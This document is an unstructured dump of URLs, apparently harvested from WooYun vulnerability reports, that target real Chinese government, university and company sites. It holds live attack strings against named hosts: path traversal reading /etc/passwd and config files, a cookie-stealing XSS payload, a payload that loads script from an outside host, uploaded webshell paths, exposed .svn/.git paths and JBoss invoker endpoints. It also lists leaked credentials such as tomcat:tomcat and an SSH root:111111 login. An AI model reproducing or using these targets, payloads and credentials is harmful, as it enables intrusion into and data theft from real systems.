http://wk10.netentsec.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.netentsec.com/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://www.netentsec.com/en/phpsso_server/index.php?m=phpsso&c=index&a=getapplist&auth_data=v=1&appid=1&data=e5c2VAMGUQZRAQkIUQQKVwFUAgICVgAIAldVBQFDDQVcV0MUQGkAQxVZZlMEGA9+DjZoK1AHRmUwBGcOXW5UDgQhJDxaeQVnGAdxVRcKQ http://service.netentsec.com/uc_server/control/admin/db.php http://dtt.chinahr.com/H/login.asp http://www.51zhangdan.com/share/invite/admin.html https://www.u51.com/service/log4net.xml http://www.homelinkhr.com/view_initIndexPageForCustomer.action http://old.med.wanfangdata.com.cn/Trace.axd inurl:queryProvidentFund.action http://app.mybj.gov.cn/BusinessServer/providentfund/ProvidentFundAction/queryProvidentFund.action?mobile=&pt=&token=&ua=&nodeId=&yzfs=2&cardId=EEDFFLEMCLDGEFELFEDD&cardPassword=ELFEDD&buttonName=%E6%9F%A5%E8%AF%A2&encryp=true http://app.mybj.gov.cn/BusinessServer/providentfund/ProvidentFundAction/queryProvidentFund.action?mobile=&pt=&token=&ua=&nodeId=&yzfs=2&cardId=EEDFFLEMCADCDLEAEEDD&cardPassword=EAEEDD&buttonName=%E6%9F%A5%E8%AF%A2&encryp=true http://www.rqbao.com http://wx.tuhu.cn/order/Info?type=sg&orderId=这里订单号 http://wx.tuhu.cn/order/Info?type=sg&orderId=TH00000003 http://wx.tuhu.cn/order/Info?type=sg&orderId=TH01818650 http://job.lmjx.net/resume.php?print=1&itemid=1092 http://bjsp.39yst.com/index.php?call=product.index&id=2273 content://com.sina.weibo.picListProvider/query_picinfo content://mms-sms/conversations/ content://telephony/apgroups/ content://com.lenovo.launcher.badge/lenovo_badges/ content://com.sina.weibo.picListProvider/query_status content://com.sina.weibo.userlog/pushinitlog/ content://com.sina.weibo.picListProvider/query_size content://com.sina.weibo.userlog/netlog content://com.android.contacts/ content://com.huawei.android.launcher.settings/badge/ content://com.sina.weibo.userlog/netlog/ content://com.android.contacts content://com.sina.weibo.blogProvider/ content://com.sina.weibo.userlog/pushinitlog content://com.sina.weibo.userlog/ content://com.sina.weibo.userlog content://com.android.launcher2.settings/favorites?notify=true/ content://com.sina.weibo.blogProvider/home/ content://com.android.launcher2.settings/favorites?notify=true content://com.sina.weibo.picListProvider/query_picinfo/ content://com.sina.push.pushprovider.1004/ content://com.sina.weibo.sdkProvider content://com.sina.weibo.picListProvider/query_status/ content://com.lenovo.launcher.badge/lenovo_badges content://com.sina.weibo.picListProvider/query_size/ content://com.sina.weibo.sdkProvider/ content://telephony/apgroups content://com.sina.weibo.blogProvider/home content://com.huawei.android.launcher.settings/badge content://com.sina.weibo.picListProvider/ content://sms/inbox/ content://downloads/public_downloads/ content://com.sina.weibo.picListProvider content://mms-sms/conversations content://com.sina.weibo.spProvider content://com.android.launcher.settings/favorites?notify=true content://sms content://com.sina.weibo.spProvider/ content://downloads/public_downloads content://com.android.launcher.settings/favorites?notify=true/ content://sms/ content://sms/inbox content://com.sina.weibo.blogProvider content://com.sina.push.pushprovider.1004 content://telephony/carriers content://telephony/carriers/preferapn/ content://telephony/carriers/ content://telephony/carriers/preferapn content://telephony/carriers content://telephony/carriers/preferapn/ content://telephony/carriers/ content://telephony/carriers/preferapn http://61.167.120.27/ http://42.121.1.195:8888/Manager/Account/Login.aspx http://dzw11.dgpt.edu.cn/Manager/Account/Login.aspx?ReturnUrl=~/Index.aspx http://work.csuft.edu.cn/Manager/Account/Login.aspx?ReturnUrl=/Index.aspx http://www.yichengpin.com http://m.yichengpin.com/admin/order/orderMgr-getOrderDetail.htm?orderHead.orderId=xxx ftp://122.114.56.217 http://www.gtamall.com/fare/farePolicy.html?method=inAllPolicyQuery&busikey=3YYNsU4AYnOcLN9GmcZkWw%3D%3D&busiid=4acbefbf6b5ee16ad93448052d6deb9459c778de https://112.126.76.199/moreDayDetail.htm?id=181 http://frsupport.msi.com http://app1.chinadaily.com.cn:80/survey/v.php?mmid=841 www.paixie.net content://mx.history/ content://com.tencent.mm.sdk.plugin.provider/sharedpref/ content://icc/adn content://com.mx.browser.downloadprovider/download/ content://com.mx.browser.downloadprovider/resetdb/ content://com.facebook.katana.provider.AttributionIdProvider/ content://com.android.launcher2.settings/favorites?notify=true/ content://com.mx.browser.commonprovider/ content://com.android.launcher2.settings/favorites?notify=true content://icc/adn/ content://suggestion.searchengine content://com.mx.browser.downloadprovider/download content://com.android.launcher.settings/favorites?notify=true/ content://com.mx.browser.downloadprovider/ content://com.mx.browser.downloadprovider/resetdb content://com.mx.browser.downloadprovider content://com.mx.browser.commonprovider content://com.facebook.katana.provider.AttributionIdProvider content://com.android.launcher.settings/favorites?notify=true content://suggestion.searchengine/ content://com.tencent.mm.sdk.plugin.provider/sharedpref content://mx.history content://com.mx.browser.browserprovider/ content://com.mx.browser.browserprovider content://com.mx.browser.browserprovider/bookmark content://com.mx.browser.browserprovider/bookmark/ content://com.mx.browser.browserprovider content://com.mx.browser.browserprovider/bookmark content://com.mx.browser.commonprovider/reader/ content://com.mx.browser.commonprovider/reader_item/ content://com.mx.browser.commonprovider/reader_item content://com.mx.browser.browserprovider/bookmark/ content://com.mx.browser.browserprovider/ content://com.mx.browser.commonprovider/reader content://com.mx.browser.browserprovider/bookmark/ http://www.hacker.com/ http://www.hacker.com/”,用户一旦不注意就会中招,造成钱财损失。 http://202.103.218.38/Login.aspx www.zdlife.net http://www.gx1996.com/system/login.jsp http://www.gx1996.com/system/borrowDetails.action?&id=1732 http://app1.chinadaily.com.cn:80/survey/vs.php?id=105&tp=0 http://www.baojia.com/about/contact/ http://open.baojia.com/account/resetpwd/ http://chaoshi.zdlife.net/ http://wutongyu.info/host.php http://lp.nia.net.cn/sg/sgAction.do?doaction=dsdetail&pid=502000 http://shenghuo.360.cn/mobile/ordertopay/OrderID/M15054305444825 http://mail.bjtu.edu.cn/这个网址 http://www.zousifun.com/admin/cms/info_xpage.do?mkcode=8021&userip=10.4.153.231&usermac=10:40:F3:91:0D:D0 http://www.piaoyou.org/ http://www.piaoyou.org/web.htm http://demo.piaoyou.org http://www.pekpiaoyou.com/case.htm url:http://219.238.131.74:80/manager/html user:tomcat pass:tomcat http://42.159.132.82:8080/ http://www.udamall.com/cn/index.php/gallery-ajax_get_goods.html http://218.7.239.170:81/PKPMBS/portal/MsgList.aspx http://218.27.1.143/PKPMBS/portal/MsgList.aspx http://www.ccjdw.com/PKPMBS/portal/MsgList.aspx http://www.jljszj.gov.cn/PKPMBS/portal/MsgList.aspx http://www.thszjz.com/PKPMBS/portal/MsgList.aspx http://dvp.travelsky.com/manager/html/ www.molb-xk.com http://223.223.177.154/ http://g.efw.cn/ http://www.chinaispo.com.cn/reg/regsuccess?checknum=3fb7eef621cb10415984706057c51517 http://www.chinaispo.com.cn/reg/regsucces http://66.150.173.133:8080/pureweb/server/login.jsp http://66.150.173.133:8080 http://66.150.173.133:8080/pureweb/resmd/studybrowser http://61.191.199.11/index.php?a=index&albums_id=5&c=../../../../../../../../../../etc/passwd%00.jpg&s=paike inurl:ProArticleInfo.aspx?ID= http://218.108.102.39:8091/index.aspx http://web.hzctc.cn/index.aspx http://www.lajyzx.gov.cn/ http://ggzy.hzsc.gov.cn/Index.aspx http://www.hcggzy.com/ http://laspzx.linan.gov.cn:8080/ http://218.108.114.98/ http://218.108.102.39:8091/ http://115.236.6.65/ http://laspzx.linan.gov.cn:8080/ http://gdxt.hxlife.com/ui http://gdxt.hxlife.com/ui/common/cvar/CExec.jsp http://shop.travelsky.com:8089/fckeditor/editor/filemanager/connectors/test.html http://www.moko.cc/profile/wechatdyy932976907.html URL:http://www.moko.cc/getpassword.html www.17g.com http://42.62.4.138/ http://cu.ruiyinxin.com/cspLoginAction.passwordRetrieve.c?&operType=2&merchId=ODg2MzcxMzU3MjIzMjY4&answer=MA==&newPassword=YWExMjM0NTY=&settleDate=MjAxNTA1MDI=&encry=true http://cu.ruiyinxin.com http://cu.ruiyinxin.com/cspLoginAction.passwordRetrieve.c?&operType=2&merchId=ODg2MzcxMzU3MjIzMjY4&answer=MA==&newPassword=YWExMjM0NTY=&settleDate=MjAxNTA1MDI=&encry=true http://cu.ruiyinxin.com/ http://www.chinahr.com/modules/jsperson/modify.php http://magicube.pconline.com.cn/lottery/result.jsp?eventId=61&success=1%3Cscript%3Ealert%28document.cookie%29%3C/script%3E http://magicube.pconline.com.cn/lottery/result.jsp?eventId=61&success=1&callback= com.suning.mobile.epa/com.suning.mobile.paysdk.ui.BankListActivity;end http://218.7.239.170:81//PKPMBS/Charts/addCharts.aspx http://218.27.1.143/PKPMBS/Charts/addCharts.aspx http://www.ccjdw.com/PKPMBS/Charts/addCharts.aspx http://www.jljszj.gov.cn/PKPMBS/Charts/addCharts.aspx http://www.thszjz.com///PKPMBS/Charts/addCharts.aspx http://www.hyjsjd.cn/PKPMBS/Charts/addCharts.aspx http://u.unikaixin.com/login.php http://u.unikaixin.com http://demo.shopxx.net/ ip:115.236.185.233 http://sl.cnsuning.com/stwebclient/index.jsp http://price.ziroom.com/ http://price.ziroom.com/?_p=../../../../../../../../../../etc/passwd%00.jpg http://epos.jxlife.com.cn/ter/indexlis.jsp http://epos.jxlife.com.cn/ter/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://m.client.10010.com/mobileService/login.htm http://jasi12333.xicp.net:41474/jxquery/ http://www.ptsn.net.cn/product/qydetail.php3 http://www.ptsn.net.cn/product/qydetail.php3?companyname=福建省鸿宇通信设备有限公司 https://www.cathayholdings.com/insurance www.cathayholdings.com使用第一级URL来定位到不同的公司,insurance https://www.cathayholdings.com/insurance/assets/services/module/carfix/CarFix.asp http://116.90.83.207:8088/TrainingInforMS/login url:http://fzf.vastpay.cn/login.action http://edm.hysec.com:8089/.svn/entries http://edm.hysec.com:8089/login/login.action http://www.cqga.gov.cn//gajpublicinfo/frontui/ApplyFinish.aspx?intApplicationID=10688 http://www.cqga.gov.cn//gajpublicinfo/frontui/ApplyQuery.aspx http://202.109.244.105:8100/zfcgzjxx/jsp/index_out.jsp http://202.109.244.105:8100/invoker/JMXInvokerServlet admin:service=DeploymentFileRepository https://vpn.just.edu.cn/dana/home/index.cgi https://vpn.just.edu.cn/Teacher/Admin/,DanaInfo=192.168.11.53+TeacherManager.aspx https://vpn.just.edu.cn/jasinda/newteacher/,DanaInfo=192.168.11.52+index.jsp https://www.itouzi.com http://ms.smartisan.com/system http://m.jinjianginns.com/ http://m.jinjianginns.com/user/forget?phone=&tip=&channel=HOTELVP_JJZX_WAP http://sms.jlcar.net:8090/user/loginAction,如图所示: http://booking.dpslpark.com/ http://booking.dpslpark.com/backend.php?method=order.show&startTime=1970-01-01&endTime=1970-01-01&parkId=0&status=255&page=1&editOrderId= http://www.zhuaxia.com/php_controller/myFeedController.php?action=channelInfo&chid=833&customerId=29034823&lastid=0&show_all_item=1&sourceid=0&stamp=0.09998915647156537&version=200812241245 http://www.zhuaxia.com/register_check.php?logId=165 http://222.221.5.77/ http://222.221.5.77 http://www.siming.gov.cn:8087/smhd/common/pre.as?_url=/WEB-INF/web.xml http://hjzx.xmtfj.gov.cn:8001/common/pre.as?_url=/WEB-INF/web.xml http://www.haicang.gov.cn:8086/hchd/common/pre.as?_url=/WEB-INF/web.xml http://cloud.xm.gov.cn:88/common/pre.as?_url=/WEB-INF/web.xml http://www.xmta.gov.cn:8090/tahdzx/common/pre.as?_url=/WEB-INF/web.xml http://wcm.xmlib.net:9090/tsg/common/pre.as?_url=/WEB-INF/web.xml http://www.xmrs.gov.cn:83/rsj/common/pre.as?_url=/WEB-INF/web.xml http://new.fjzzy.org:8070/zzxy/common/pre.as?_url=/WEB-INF/web.xml http://www.fjlylc.gov.cn:8081/lchd/common/pre.as?_url=/WEB-INF/web.xml http://www.xmgs.gov.cn:8089/xmgsj/common/pre.as?_url=/WEB-INF/web.xml http://www.xiangan.gov.cn:8082/xahd/common/pre.as?_url=/WEB-INF/web.xml http://www.jlxfdc.com:8308/login.aspx http://220.180.164.175/login.aspx http://www.lysfgj.com:81/login.aspx http://www.ahjsfdc.com:81/login.aspx http://www.ychfgj.com/ba/Login.aspx http://220.180.164.175/login.aspx http://218.75.147.77:83/login.aspx http://www.ychfgj.com/ba/Login.aspx http://www.jlxfdc.com:8308/login.aspx http://www.zyfcj.com:81/login.aspx http://117.141.124.166/login.aspx http://222.134.62.118/login.aspx http://www.ahjsfdc.com:81/login.aspx http://www.suyufc.gov.cn/login.aspx http://ba.snajfdc.com:8888/login2.aspx http://218.89.108.173:8080/login.aspx http://61.134.55.211:8080/login.aspx http://www.mcfcj.com:8080/login.aspx http://lsfcj.com/login.aspx http://www.longkoufg.com:81/login2.aspx http://longkoufg.com:81/login2.aspx http://www.cpfgw.com/login.aspx http://git.tongbanjie.com/ http://dev.igetui.com/login.htm http://182.151.197.205:18081/emp/selfOpenAccountAction!preAddQYFR.action?parentId=1037 http://182.151.197.205:18081/emp/bak.jsp密码chopper http://sales.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/passwd http://sales.jxlife.com.cn:9090/uploadfile?istrade=istrade&filename=../../../../../etc/hosts http://www.elifepay.com.cn/ http://www.jiangxilvyou.com/line_order/detail/918 http://news.oppomobile.com/panel/ http://www.jl54.org/jlgqt/public/content.jsp?id=73126&classid=1220000000&mainid=1220000000 http://boke2.ku6.com http://zc.zt-express.com http://zc.zt-express.com/declare/Down/DownAdmin.aspx http://202.108.145.32 http://scm0.digitalchina.com/wiki/index.php?title=%E9%A6%96%E9%A1%B5 http://www.hzfc.gov.cn/subject/16jjf3/050906mingdan.htm http://webcall.airchina.com.cn:9090/upload/message/3.JSPX http://119.6.98.100:18081/emp/selfOpenAccountAction!preAddZRR.action,经检测,未被修复。 http://static.wooyun.org/wooyun/upload/201504/28225602693282c8067081aa6426a7beae3561c6.jpg http://static.wooyun.org/wooyun/upload/201504/282254292245cadfc9b3da2954c69f8da75c2c00.jpg http://116.255.255.250:8582/BZBEMP/selfOpenAccountAction!preAddZRR.action http://121.15.133.162:8083/emp/selfOpenAccountAction!preAddZRR.action http://hy.csrpme.com/selfOpenAccountAction!preAddZRR.action http://124.172.243.231:8016/BZBEMP/selfOpenAccountAction!preAddZRR.action http://user.tjmme.com:8582/emp/selfOpenAccountAction!preAddZRR.action http://183.56.166.53:8582/EMP/LoginAction!login.action www.jshqjt.com------------- ssh:222.184.82.126:2201 root:111111 http://szhxy.guet.edu.cn/qxgl/showimg.aspx?fn=../qxgl/web.config http://www.ytehome.com/ http://esales.baosteel.com/baosteel_csm/ce/tLfqmActionCas1.cas?orderNum=X5J0001711&userNum=000107&system=NS&saleNetwork=A&userNo=0000&userNum=000107 http://esales.baosteel.com/baosteel_csm/ce/tLfqmActionCas1.cas?orderNum=X5J0001718&userNum=000107&system=NS&saleNetwork=A&userNo=0000&userNum=000107 http://esales.baosteel.com/baosteel_online/clearLoginSession.jsp http://it.zt-express.com http://it.zt-express.com/Views/BaQiang/BaQiangWangDian.aspx http://w.189.cn/ http://w.189.cn/wd/main.do?author=WT16109 http://w.189.cn/wd/main.do?author=WT3813 http://w.189.cn/wd/main.do?author=WT10692 http://w.189.cn/的两个账号,弱口令000000,当时成功登陆了(现在密码已经失效),找到一个地方可以上传文件,没有限制,导致getshell。 http://w.189.cn/wd/main.do?author=WT16109 http://w.189.cn/upload/images/20150614_154235124.jsp http://w.189.cn/admin/upload/images/20150411_11352641.jsp http://218.83.246.48/ http://www.adcosystem.cn:81/zabbix http://mail.cztv.com http://119.6.68.126:8086/ http://cti.dkd.net.cn/ http://222.73.37.218:81/ http://211.152.38.173/ http://211.152.52.234:82/ http://116.247.83.22/ http://61.129.255.238/ https://wl.zt-express.com https://wl.zt-express.com/systeminfo/MianDan/MianDanList.aspx http://wooyun.org/bugs/wooyun-2010-0116229 http://i.auto.sohu.com/user/userinfo/toModifyUserInfo.at# http://saa.auto.sohu.com/upload/tmp/11682554/20150614172550.jpg http://my.tv.sohu.com/crossdomain.xml http://i.sohu.com/crossdomain.xml http://uc.tuanche.com/login/quit www.jfshare.com http://www.zugame.com/xsk/?gid=249 http://ydxuexi.cnsuning.com/clp/redirectLogin.htm http://analytics.goodbaby.com/.git/config http://124.164.240.217:8080/finance03/monitor/szgk_form0.jsp?village_dm=0106010 http://hcnl.gov.cn:8082/finance_hc/monitor/szgk_form0.jsp?village_dm=0106010 http://221.180.22.229:8080/finance//monitor/szgk_form0.jsp?village_dm=0106010 http://218.11.132.158:8081/finance_hbcd//monitor/szgk_form0.jsp?village_dm=0106010 http://202.99.207.13:8082/finance39//monitor/szgk_form0.jsp?village_dm=0106010 http://218.56.132.248:8082/finance_lysyn//monitor/szgk_form0.jsp?village_dm=0106010 http://124.164.240.217:8080/finance03/monitor/szgk_form1.jsp?village_dm=0106010 http://106.74.112.41:8081/finance_nxyc//monitor/szgk_form1.jsp?village_dm=0106010 http://61.178.243.127:8081/finance_yc//monitor/szgk_form1.jsp?village_dm=0106010 http://218.87.99.80:8080/finance_jx05//monitor/szgk_form1.jsp?village_dm=0106010 http://221.180.22.229:8080/finance//monitor/szgk_form1.jsp?village_dm=0106010 http://124.164.240.217:8080/finance03/monitor/szgk_form2.jsp?village_dm=0106010 http://221.180.22.229:8080/finance//monitor/szgk_form2.jsp?village_dm=0106010 http://hcnl.gov.cn:8082/finance_hc//monitor/szgk_form2.jsp?village_dm=0106010 http://218.11.132.158:8081/finance_hbcd//monitor/szgk_form2.jsp?village_dm=0106010 http://218.56.132.248:8082/finance_lysyn//monitor/szgk_form2.jsp?village_dm=0106010 http://218.56.40.229:8037//newsymItemView/Item2.aspx?id=021973 http://123.134.189.60:8022//newsymItemView/Item2.aspx?id=021973 http://222.135.109.70:8200//newsymItemView/Item2.aspx?id=021973 http://218.56.99.84:8003//newsymItemView/Item2.aspx?id=021973 http://jwh.tanljgzx.gov.cn/newsymItemView/Item2.aspx?id=021973 http://218.206.191.22/prm/ http://218.206.191.22/prm/authprm/accountManage/accountRegOAgainDraft.jsp?accountId=0000015211 http://218.206.191.22/prm_server/attachment!download.action?attachFileId=200100196559&domain=sp http://git.tongbanjie.com后台弱口令导致的 www.haohaizi.com http://**.**.**/Public/login/ http://tcm.iquanyou.com.cn/tcm/login.jsp http://dabao.muzhiwan.com/.svn/entries http://club.591hx.com/index_on1.aspx https://mail.sgcc.com.cn/webmail/login/login.do http://remotebak.abchinalife.cn:7060/ui/common/easyQueryVer3/EasyQueryXML.jsp时,会跳转到http://remotebak.abchinalife.cn:7060/ui/indexlis.jsp让我误以为程序已经做了权限控制。 http://remotebak.abchinalife.cn:7060/ui/common/easyQueryVer3/EasyQueryXML.jsp http://remotebak.abchinalife.cn:7060/ui/indexlis.jsp http://www.1more.com/min?f=../../../../../../../../../../etc/nginx/nginx.conf%00.js http://360class.cn/ http://360class.cn/vip_center.html http://12580wap.10086.cn/wap5/user!q.do https://ibs.bjrcb.com/per/login.do https://emkei.cz/ http://mail.smartisan.com http://ms.jd.com/easy/quick/new.html http://url/adminconfig/admin/add_admin.php http://222.170.47.226:8888 http://ayibang.com/appointment/detail?city=%E5%8C%97%E4%BA%AC&keyword=../../../../../../../../../../etc/passwd%00.jpg http://223.6.253.93/public/Public/login http://uctest.ucweb.com:81/wml/Graphics/Showpic/showpic.php?subdir=../ http://admin.mafengwo.cn/ http://oa.11777711.com/login.php http://**.**.**/kpi/login.jsp http://ms.jd.com/easy/quick/new.html这个地方 http://oa.sdufe.edu.cn/set_book.php?online=1 https://vpn.sdufe.edu.cn/por/service.csp?rnd=lmgjiilfibhgggbd http://60.191.222.254/ http://dgdz.xzit.edu.cn/model/TwoGradePage/OurCourse.aspx?columnId=272 http://sys.zafu.edu.cn:81//model/TwoGradePage/OurCourse.aspx?columnId=272 http://hzhlab.hytc.edu.cn/model/TwoGradePage/OurCourse.aspx?columnId=272 http://182.129.150.10:8001/model/TwoGradePage/OurCourse.aspx?columnId=272 http://labch.cumt.edu.cn:81/model/TwoGradePage/OurCourse.aspx?columnId=272 http://dgdz.xzit.edu.cn/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://sys.zafu.edu.cn:81/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://hzhlab.hytc.edu.cn/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://182.129.150.10:8001/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://labch.cumt.edu.cn:81/model/TwoGradePage/yuyuelist.aspx?columnId=249 http://dgdz.xzit.edu.cn/model/TwoGradePage/experiment.aspx?columnId=258 http://sys.zafu.edu.cn:81/model/TwoGradePage/experiment.aspx?columnId=258 http://hzhlab.hytc.edu.cn/model/TwoGradePage/experiment.aspx?columnId=258 http://182.129.150.10:8001/model/TwoGradePage/experiment.aspx?columnId=258 http://labch.cumt.edu.cn:81/model/TwoGradePage/experiment.aspx?columnId=258 http://ycjg.jsfda.gov.cn/openfireweb/ http://ycjg.jsfda.gov.cn/openfireweb/ShowEnterpUploadRecordInvoic1.action http://ycjg.jsfda.gov.cn/openfireweb/ShowEnterpUploadRecordInvoic1.action http://console.just.edu.cn/ http://www.mayi.com/landlord/850351493/order/850030576 http://www.mayi.com/landlord/850351493/order/850340576 http://platform.51fenqi.com/enter/login http://wooyun.org/bugs/wooyun-2010-082279 http://www.scyahyez.com/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://jwculture.com/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://www.lcxyz.com:21245/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://183.167.250.28:85/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://www.suyaxing.com:81/SRP2003/UserManage/sysuser/modifypage.asp?id=1 http://jwmis.dzvtc.edu.cn//web/web/kebiao/kebiao.asp http://www.cdtlgcxx.com:2110/web/web/kebiao/kebiao.asp http://jw.sxjgxy.edu.cn/web/web/kebiao/kebiao.asp http://score.xaau.edu.cn/web/web/kebiao/kebiao.asp http://jw.cduestc.cn/web/web/kebiao/kebiao.asp http://223.67.133.9:81/syxdzts/gl_pl_1.asp http://lsxnmxx.js.cn:41516/tushu/gl_pl_1.asp http://112.4.228.169:880/gl_pl_1.asp http://ebook.lygfls.com/gl_pl_1.asp http://www.hssqjy.com/dzts/gl_pl_1.asp http://www.gyxsqex.com/tushu/gl_pl_1.asp http://www.dhtfxx.com/tushu/gl_pl_1.asp http://223.67.133.9:81/syxdzts/gl_pl_1.asp http://223.67.133.9:81/syxdzts/gl_pl_shen.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_pl_shen.asp?id= http://112.4.228.169:880/gl_pl_shen.asp?id= http://ebook.lygfls.com/gl_pl_shen.asp?id= http://www.hssqjy.com/dzts/gl_pl_shen.asp?id= http://www.gyxsqex.com/tushu/gl_pl_shen.asp?id= http://www.dhtfxx.com/tushu/gl_pl_shen.asp?id= http://www.dhtfxx.com/tushu/gl_pl_shen.asp?id= http://223.67.133.9:81/syxdzts/gl_pl_shan.asp?id= http://lsxnmxx.js.cn:41516/tushu/gl_pl_shan.asp?id= http://112.4.228.169:880/gl_pl_shan.asp?id= http://ebook.lygfls.com/gl_pl_shan.asp?id= http://www.hssqjy.com/dzts/gl_pl_shan.asp?id= http://www.gyxsqex.com/tushu/gl_pl_shan.asp?id= http://www.dhtfxx.com/tushu/gl_pl_shan.asp?id= http://www.dhtfxx.com/tushu/gl_pl_shan.asp?id= http://xxfw.tjciq.gov.cn/portal/portalInit.action?method=findAll存在struts2命令执行漏洞 http://cps.g2.cn/index.php http://opm.g2.cn/ http://61.191.199.33/ http://218.108.129.77:8080/华数无线运营中心 http://218.108.129.133:8888/ http://218.108.129.135:8080/demo_main.do http://60.209.248.228/jeeadmin/jeecms/index.do http://wm.shqgy.com.cn/aspx.aspx http://fangvip.ganji.com/hr_v2/?c=auth&a=loginOut http://console.jhun.edu.cn/login http://gra.guet.edu.cn/,于是乎,找到了搜索框注入, http://gra.guet.edu.cn/search.aspx?Category=all&keywords=1 http://login.unipus.cn/register.php http://familymart.kembo88.com/ http://wechat.kembo88.com/ http://familymart.kembo88.com/api/v1/admin_is_login http://wechat.kembo88.com/api/admin_is_login http://wechat.kembo88.com/api/configs http://www.incopat.com/login/tologin.action http://it.zotye.com:88/user_initLogin.action http://oa.zotye.com/main/login.jsp http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/Webpage/Search.aspx?select=a http://192.168.0.113:8080/?action=Auth&authcode=111111&t=1434349686078 http://211.90.241.58/WebApp/emoss//files/login/login.jsp http://211.90.241.58/WebApp/emoss//files/ http://vip.veryeast.cn/system/micro http://m.veryeast.cn/micro/site/index?c_userid=2277338 http://lms2.9first.com/register/company?name=%E8%80%81%E5%88%98&contacts=%3Cimg%20src=x%20onerror=s=createElement%28%27script%27%29;body.appendChild%28s%29;s.src=%27http://xiix.ml/sOg9ag%27;%3E&contacts_mobile=13015648625 http://sss.qq.com/web.sql http://eye.gome.com.cn/ http://www.piaoyou.org/case_web.htm http://www.h-h.com.cn www.h-h.com.cn http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/Webpage/Qa_content.aspx?info=4124 comm.tongji.edu.cn/admin/Login.asp comm.tongji.edu.cn/Ch/kyview.asp?ID=21 jpkc.tongji.edu.cn/jpkc/hltjgjbyl/admin/login.asp jpkc.tongji.edu.cn/jpkc/hltjgjbyl/teacherinfo.asp?id=8 agri.tongji.edu.cn/Search.aspx?search= cs.tongji.edu.cn/administrator/index.php cs.tongji.edu.cn/index.php?format=feed&type=rss http://yun.btvtech.com/tpp/rest/login.html;JSESSIONID=2dc18ff99da48dee7c9ef2017171f9ed http://yun.btvtech.com/tpp/rest/o/download.json?filepath=http://27.112.87.228:80/Y:/体育FTP素材入线索库/Low/2015-06-01/010615050-shara-post-uncut-1_14331653191.mp4 http://27.112.87.228:80 http://27.112.87.228/C:/Windows/system.ini http://www.tvmcloud.com/Home/Index/index http://cloud.btvtech.com/search.htm http://video.wanfangdata.com.cn/manage/ http://aqe.wyn88.com/Quickas/ http://aqe.wyn88.com/Quickas/privilege/account.jsp http://211.150.77.29/common/activeX/activeX.php http://211.150.77.29/common/web_meeting/ http://webmeet.263.net mat.tongji.edu.cn/bbs http://mat.tongji.edu.cn/bbs/mymodify.asp http://mat.tongji.edu.cn/bbs/UploadFace/2015-5/cun.asp http://blog.ifeng.com/crossdomain.xml http://mypic.ifeng.com/upload/upload/2015/06/15/f2c667ac4357371d1434358956.jpg?1434358956 http://pan.baidu.com/s/1bn766x5 http://prc.ifeng.com/playRecord/getList?username=jearyxxx&sid=此处改为你自己的sid&start=0&limit=20&callback= http://tuitui.7po.com/.svn/entries http://www.unimeeting.cn/) http://schedule.unimeeting.cn) http://idg.unimeeting.cn/) http://60.12.233.59:80/ https://www.sidatz.com/images/head.jpg/1.php http://bbs.sidatz.com/template/comiis_x25jymf/css/comiis/logo.png/.php http://bbs.sidatz.com/data/attachment/forum/201506/15/18285071y33k31327u53vf.gif/.php txt:http://bbs.sidatz.com/1.txt https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf上说的很详细了。 http://www.test.com/?q=xss1&q=xss2,不同的WEB服务器处理的方式不一样,个人感觉http://blog.csdn.net/eatmilkboy/article/details/6761407中google和yahoo的例子已经将HPP的原理讲得很清楚了。 http://blog.csdn.net/eatmilkboy/article/details/6761407中提到的刷票) http://xue.jd.com/ondemandCourse/queryOndemandCoursePage.action?classifyId=&courseLable=%25E6%258E%25A8%25E5%25B9%25BF&courseName=123&courseName=1234&flag=1 http://union.lashou.com/index.php?r=my/my/view&id=message&message_id=1 http://www.gx1996.com/forget_password.action http://www.dpex.com.tw/log.asp ttp://221.224.50.46/ http://jy.4000211929.com/ http://61.129.251.198:81/ http://demo.piaoyou.org/ http://61.129.251.198:88/ http://58.246.26.230:81/ http://122.227.255.94:81/ http://180.166.101.94:81/ http://222.128.120.192:81/ http://oa.zhongbo-china.com/ http://oa.jl-travel.com/ http://oa.dxtravel.cn http://cz.4000211929.com http://hy.4000211929.com/ www.yeehang.cc/ http://zhuaqu.blog.caijing.com.cn/.svn/entries http://111.1.15.92:8080/imc/login.jsf?reloginFlag=true http://www.lvgou.com/ http://redlantern.thehanshow.com/website/admin.php http://redlantern.thehanshow.com/website/admin.php?mod=opus&check=1&nowpage=3 www.test.sfn.com.cn http://www.test.sfn.com.cn/index.php/trends/li/1?c_id=4 ttp://221.224.50.46/ http://jy.4000211929.com/ http://61.129.251.198:81/ http://demo.piaoyou.org/ http://61.129.251.198:88/ http://58.246.26.230:81/ http://122.227.255.94:81/ http://180.166.101.94:81/ http://222.128.120.192:81/ http://oa.zhongbo-china.com/ http://oa.jl-travel.com/ http://oa.dxtravel.cn http://cz.4000211929.com http://hy.4000211929.com/ www.yeehang.cc/ http://demo.piaoyou.org/bx/base.aspx?gysid=39&gysname=%u592a%u5e73%u6d0b&id=2%27&m=8 http://demo.piaoyou.org/flight/kaipiao_edit.aspx?id=937 http://demo.piaoyou.org/flight/refund_update.aspx?id=942&sid=438 http://shuangyashan.hljjt.gov.cn:80/module/jslib/jquery/jpage/dataproxy.jsp?unitid=1 